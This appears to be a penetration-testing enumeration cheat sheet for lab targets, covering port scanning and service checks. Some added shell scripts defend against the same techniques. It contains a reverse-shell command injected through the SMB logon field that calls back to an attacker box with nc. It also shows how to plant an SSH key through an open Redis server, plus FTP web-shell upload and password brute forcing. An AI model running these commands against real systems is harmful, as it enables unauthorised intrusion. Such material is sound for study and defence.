Enumeration
​
Port Scanning :
    nmap -sC -sV -o nmap -A -T5 10.10.10.x

Host Discovery
    nmap -sn 10.10.1.1-254 -vv -oA hosts
    netdiscover -r 10.10.10.0/24
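The -oA hosts run above also writes a grepable hosts.gnmap file. The following shell is an added example, not part of the original cheat sheet: it pulls the "Status: Up" hosts out of that format with awk and then lists the live hosts that are missing from an asset inventory, which is the defender's side of the same sweep (an unexpected answering host on a segment is worth a ticket). The gnmap lines and the inventory are constructed for the example.

```shell
#!/bin/sh
# Added example: parse the grepable output that "nmap -sn ... -oA hosts" writes
# to hosts.gnmap and compare the live hosts with an asset inventory.

# Constructed hosts.gnmap excerpt (not real scan data). The real file separates
# fields with tabs; awk's default field splitting handles tabs and spaces alike.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sn 10.10.1.1-254 -vv -oA hosts
Host: 10.10.1.1 ()  Status: Up
Host: 10.10.1.7 (printer.lab)  Status: Up
Host: 10.10.1.9 ()  Status: Down
Host: 10.10.1.23 ()  Status: Up
# Nmap done at Mon Jan  1 00:00:09 2024 -- 254 IP addresses (3 hosts up) scanned in 8.90 seconds'

# Constructed asset inventory: IPs that are expected to answer on this segment.
KNOWN_HOSTS='10.10.1.1
10.10.1.7'

# Read grepable nmap output on stdin; print the IP of every host marked "Status: Up".
live_hosts() {
    awk '$1 == "Host:" && /Status: Up/ { print $2 }'
}

# Read grepable nmap output on stdin; print live hosts that do not appear in the
# newline-separated inventory passed as $1 (exact, whole-line match).
unknown_live_hosts() {
    inventory=$1
    live_hosts | while read -r ip; do
        printf '%s\n' "$inventory" | grep -qxF "$ip" || printf '%s\n' "$ip"
    done
}

# Stand-alone run: list live hosts, then the ones missing from the inventory.
printf '%s\n' "$SAMPLE_GNMAP" | live_hosts
echo '--- live hosts not in inventory ---'
printf '%s\n' "$SAMPLE_GNMAP" | unknown_live_hosts "$KNOWN_HOSTS"
```

On a real file the calls become `live_hosts < hosts.gnmap` and `unknown_live_hosts "$(cat inventory.txt)" < hosts.gnmap`; the live-host list can be fed back to nmap with `-iL`.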
6
​
7
DNS server discovery
8
β€’ nmap -p 53 10.10.10.1-254 -vv -oA dcs
9
10
NSE Scripts Scan
11
* nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
12
13
Port specific NSE script list :
14
​
15
ls /usr/share/nmap/scripts/ssh*
16
ls /usr/share/nmap/scripts/smb*
Copied!
Scanning all 65535 ports :
    masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
    nmap -Pn -sV -sC -p$ports 10.10.10.x

Running specific NSE scripts :
    nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A

-sC : default scripts, -sV : version detection, -oA : output in all formats
Optional : -sT (full TCP connect scan instead of a SYN scan, to avoid being flagged by firewalls)
From the Apache version to the Ubuntu version -> search "ubuntu httpd versions"
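The one-line awk pipeline above folds TCP and UDP ports together and keeps duplicates (masscan prints a port again when it retransmits). The shell below is an added example, not code from the original cheat sheet: it parses the same "Discovered open port N/proto on IP" lines, keeps the two protocols apart, deduplicates, and emits the `T:...,U:...` form that nmap's -p accepts. The masscan lines are constructed for the example.

```shell
#!/bin/sh
# Added example: turn masscan's "Discovered open port ..." lines into an nmap
# port specification, keeping TCP and UDP ports apart and removing duplicates.

# Constructed masscan output (not from a real scan). The repeated 80/tcp line
# stands in for masscan's retransmit duplicates.
SAMPLE_MASSCAN='Discovered open port 80/tcp on 10.10.10.5
Discovered open port 22/tcp on 10.10.10.5
Discovered open port 161/udp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 443/tcp on 10.10.10.5'

# Print the sorted, deduplicated port numbers for one protocol ("tcp" or "udp")
# found in masscan output passed on stdin, joined with commas.
ports_for_proto() {
    awk -v proto="$1" '$1 == "Discovered" && $2 == "open" && $3 == "port" {
            split($4, pp, "/")
            if (pp[2] == proto) print pp[1]
        }' | sort -un | tr '\n' ',' | sed 's/,$//'
}

# Read masscan output on stdin and print an nmap -p argument such as
# "T:22,80,443,U:161". Either half is left out when no ports of that type were seen.
masscan_to_nmap_spec() {
    input=$(cat)
    tcp=$(printf '%s\n' "$input" | ports_for_proto tcp)
    udp=$(printf '%s\n' "$input" | ports_for_proto udp)
    spec=""
    [ -n "$tcp" ] && spec="T:$tcp"
    [ -n "$udp" ] && spec="${spec:+$spec,}U:$udp"
    printf '%s\n' "$spec"
}

# Stand-alone run: prints T:22,80,443,U:161 for the sample above.
printf '%s\n' "$SAMPLE_MASSCAN" | masscan_to_nmap_spec
```

With a real capture this is `nmap -Pn -sS -sU -sV -p "$(masscan_to_nmap_spec < ports)" 10.10.10.x`; nmap only scans the `U:` half when -sU is present, otherwise it warns and skips those ports.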
FTP : (Port 21)
    anonymous login check
      ftp <ip address>
      username : anonymous
      password : anonymous
    file upload -> put shell.php
SSH : (Port 22)
id_rsa.pub : public key; placed in a target account's authorized_keys it permits login with the matching private key
id_rsa : private key that is used for login. Might ask for a passphrase, which can be cracked with ssh2john and john
    ssh -i id_rsa <user>@<ip address>
    For passwordless login, add id_rsa.pub to the target's authorized_keys
    ssh2john id_rsa
DNS Zone transfer check : (Port 53)
RPC Bind (111)
    rpcclient --user="" --command=enumprivs -N 10.10.10.10
    rpcinfo -p 10.10.10.10
    rpcbind -p 10.10.10.10
RPC (135)
    rpcdump.py 10.11.1.121 -p 135
    rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np   # get pipe names

    rpcmap.py ncacn_ip_tcp:10.11.1.121[135]
SMB (139 & 445)
    nmap --script smb-protocols 10.10.10.10

    smbclient -L //10.10.10.10
    smbclient -L //10.10.10.10 -N   # no password (SMB null session)
    smbclient --no-pass -L 10.10.10.10
    smbclient //10.10.10.10/share_name

    smbmap -H 10.10.10.10
    smbmap -H 10.10.10.10 -u '' -p ''
    smbmap -H 10.10.10.10 -s share_name

    crackmapexec smb 10.10.10.10 -u '' -p '' --shares
    crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
    crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
    crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name

    enum4linux -a 10.10.10.10

    rpcclient -U "" 10.10.10.10
        * enumdomusers
        * enumdomgroups
        * queryuser [rid]
        * getdompwinfo
        * getusrdompwinfo [rid]

    ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v

    mount -t cifs "//10.1.1.1/share/" /mnt/wins
    mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0

SMB Shell to Reverse Shell :
    smbclient -U "username%password" //192.168.0.116/sharename
    smb> logon "/=nc 'attack box ip' 4444 -e /bin/bash"

Checklist :
    * Samba symlink directory traversal attack
SMB Exploits :
SNMP (161)
    snmpwalk -c public -v1 10.0.0.0
    snmpcheck -t 192.168.1.X -c public
    onesixtyone -c names -i hosts
    nmap -sT -p 161 192.168.X.X -oG snmp_results.txt
    snmpenum -t 192.168.1.X
IRC (194,6667,6660-7000)
NFS (2049)
MYSQL (3306)
    nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
Redis (6379)
In the output of config get * you can find the home directory of the redis user (usually /var/lib/redis or /home/redis/.ssh). Knowing it, you know where you can write an authorized_keys file to get SSH access as the redis user. If you know the home directory of another valid user where you have write permission, you can abuse that in the same way:
    1. Generate an SSH public-private key pair on your machine: ssh-keygen -t rsa
    2. Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
    3. Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
    4. Save the public key to the authorized_keys file on the redis server:
        <user>@<host>:~# redis-cli -h 10.85.0.52
        10.85.0.52:6379> config set dir /home/test/.ssh/
        OK
        10.85.0.52:6379> config set dbfilename "authorized_keys"
        OK
        10.85.0.52:6379> save
        OK
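The sequence above works only because the server accepts unauthenticated remote clients and still lets them run CONFIG SET. The shell below is an added example, not part of the original cheat sheet: it reads a redis.conf and reports the settings that leave that path open (bind on all interfaces, protected-mode off, no requirepass, CONFIG not disabled with rename-command). Both configuration excerpts are constructed; on Redis 6 and later, ACLs that deny the CONFIG command to a user are an alternative to rename-command, which this check does not look for.

```shell
#!/bin/sh
# Added example: audit a redis.conf for the settings that make the
# CONFIG SET dir / dbfilename / SAVE sequence above possible.

# Constructed redis.conf excerpts (not from a real host).
WEAK_REDIS_CONF='bind 0.0.0.0
protected-mode no
port 6379
# no requirepass, CONFIG still enabled
dir /var/lib/redis'

HARDENED_REDIS_CONF='bind 127.0.0.1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis'

# Read a redis.conf on stdin, print one line per weak setting, and return the
# number of findings (0 means every check passed).
audit_redis_conf() {
    conf=$(grep -v '^[[:space:]]*#' || true)   # drop comment lines
    findings=0
    # 1. Reachable from other hosts: bind missing, or covering all interfaces.
    if ! printf '%s\n' "$conf" | grep -qE '^bind[[:space:]]' ||
         printf '%s\n' "$conf" | grep -qE '^bind[[:space:]].*(0\.0\.0\.0|\*)'; then
        echo 'bind: listens on all interfaces'; findings=$((findings + 1))
    fi
    # 2. protected-mode off lets unauthenticated remote clients in.
    if ! printf '%s\n' "$conf" | grep -qE '^protected-mode[[:space:]]+yes'; then
        echo 'protected-mode: not set to yes'; findings=$((findings + 1))
    fi
    # 3. No password means anyone who can connect can issue CONFIG SET.
    if ! printf '%s\n' "$conf" | grep -qE '^requirepass[[:space:]]+[^[:space:]]'; then
        echo 'requirepass: not set'; findings=$((findings + 1))
    fi
    # 4. CONFIG still callable at runtime, so dir/dbfilename can be redirected.
    if ! printf '%s\n' "$conf" | grep -qE '^rename-command[[:space:]]+CONFIG[[:space:]]+""'; then
        echo 'rename-command CONFIG: not disabled'; findings=$((findings + 1))
    fi
    return "$findings"
}

# Stand-alone run: the weak excerpt produces four findings, the hardened one none.
printf '%s\n' "$WEAK_REDIS_CONF" | audit_redis_conf || echo "findings: $?"
printf '%s\n' "$HARDENED_REDIS_CONF" | audit_redis_conf && echo 'hardened: no findings'
```

Run it against a live host with `audit_redis_conf < /etc/redis/redis.conf`; a non-zero exit status makes it usable as a gate in a configuration-management check.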
Port Knocking :
    TCP
    knock -v 192.168.0.116 4 27391 159

    UDP
    knock -v 192.168.0.116 4 27391 159 -u

    TCP & UDP
    knock -v 192.168.1.111 159:udp 27391:tcp 4:udp
Misc :
IF NOTHING WORKS